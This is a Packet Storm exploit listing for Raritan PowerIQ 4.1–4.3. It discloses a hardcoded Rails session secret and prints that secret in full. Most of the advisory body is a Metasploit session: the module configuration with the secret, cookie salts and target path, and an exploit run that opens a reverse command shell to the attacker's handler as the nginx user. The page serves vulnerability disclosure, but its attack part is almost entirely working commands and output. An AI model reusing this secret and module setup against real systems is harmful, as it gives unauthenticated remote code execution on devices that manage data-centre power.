exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Raritan PowerIQ 4.1 / 4.2 / 4.3 Code Execution

Raritan PowerIQ 4.1 / 4.2 / 4.3 Code Execution
Posted Mar 12, 2015
Authored by Brandon Perry

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web interface with a hardcoded session secret. This can be used to achieve unauthenticated remote code execution as the nginx user on vulnerable systems.

tags | exploit, remote, web, code execution
SHA-256 | 681c8bb72ae6628420487909d37bf9e367efcdc762196f727263b8b5ca086eda

Raritan PowerIQ 4.1 / 4.2 / 4.3 Code Execution

Change Mirror Download
Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web
interface with a hardcoded session secret
of 8e238c9702412d475a4c44b7726a0537.

This can be used to achieve unauthenticated remote code execution as the
nginx user on vulnerable systems.

msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

Name Current Setting

Required Description
---- ---------------

-------- -----------
COOKIE_NAME

no The name of the
session cookie
DIGEST_NAME SHA1

yes The digest type
used to HMAC the session cookie
HTTP_METHOD GET

yes The HTTP request
method (GET, POST, PUT typically work)
Proxies

no A proxy chain of
format type:host:port[,type:host:port][...]
RAILSVERSION 3

yes The target Rails
Version (use 3 for Rails3 and 2, 4 for Rails4)
RHOST 192.168.0.20

yes The target address
RPORT 443

yes The target port
SALTENC
BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==
yes The encrypted cookie salt
SALTSIG 42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8

yes The signed
encrypted cookie salt
SECRET 8e238c9702412d475a4c44b7726a0537

yes The secret_token
(Rails3) or secret_key_base (Rails4) of the application (needed to sign the
cookie)
TARGETURI /login/login

yes The path to a
vulnerable Ruby on Rails application
VALIDATE_COOKIE true

no Only send the
payload if the session cookie is validated
VHOST

no HTTP server
virtual host


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729)
at 2015-03-11 19:45:20 -0500

id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close